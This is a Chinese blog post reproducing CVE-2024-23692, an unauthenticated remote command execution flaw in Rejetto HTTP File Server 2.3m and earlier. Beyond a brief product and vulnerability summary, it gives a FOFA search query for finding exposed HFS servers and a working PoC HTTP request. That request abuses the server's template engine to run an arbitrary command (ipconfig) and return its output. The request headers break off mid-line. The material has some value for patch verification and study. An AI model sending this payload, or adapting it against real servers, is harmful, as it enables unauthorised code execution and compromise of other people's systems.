热门标签
热门文章
- 1win10彻底卸载MySQL_wind10 的mysql注册表删除路径
- 2SpringBoot使用MockMVC单元测试Controller_springboot mockmvc
- 3公网IP被别人恶意解析的后果
- 4《深入浅出数据科学》[美]斯楠·奥兹德米尔(Sinan Ozdemir)读书笔记_用什么可以描述数据范围的广度
- 5使用开源RustDesk部署远程控制服务
- 6[MAC 苹果电脑] [Linux 系统] ”苹果电脑使用虚拟机安装 Linux Ubuntu系统”教程_苹果虚拟机安装乌班图
- 7sql-update 用法_sql update
- 8数据库分库分表方案_分库分表 注入1024个数据源
- 9PyCharm 2021.2.2 试用超过30天,重新试用_pycharm试用30天过了怎么弄
- 10kail linux配置无线网络,Kali Linux 无线渗透测试入门指南 第一章 配置无线环境
当前位置: article > 正文
Rejetto HTTP文件服务器 未授权RCE漏洞复现(CVE-2024-23692)_cve-2024-23692环境准备
作者:在线问答5 | 2024-07-31 10:03:34
赞
踩
cve-2024-23692环境准备
0x01 产品简介
Rejetto HTTP File Server(HFS)是一个基于HTTP协议的文件服务器软件,旨在为用户提供简单、轻量级且易于使用的文件共享解决方案。功能强大、易于使用的文件服务器软件,无论是个人使用还是团队协作,HFS都能满足用户的需求,提高工作效率。
0x02 漏洞概述
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。 成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
0x03 影响范围
Rejetto HTTP File Server <= 2.3m
0x04 复现环境
FOFA:app="HFS"
0x05 漏洞复现
PoC
- GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
- Accept: text/html,application/xhtml+xml,application/xml;q=
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/在线问答5/article/detail/908323
推荐阅读
相关标签
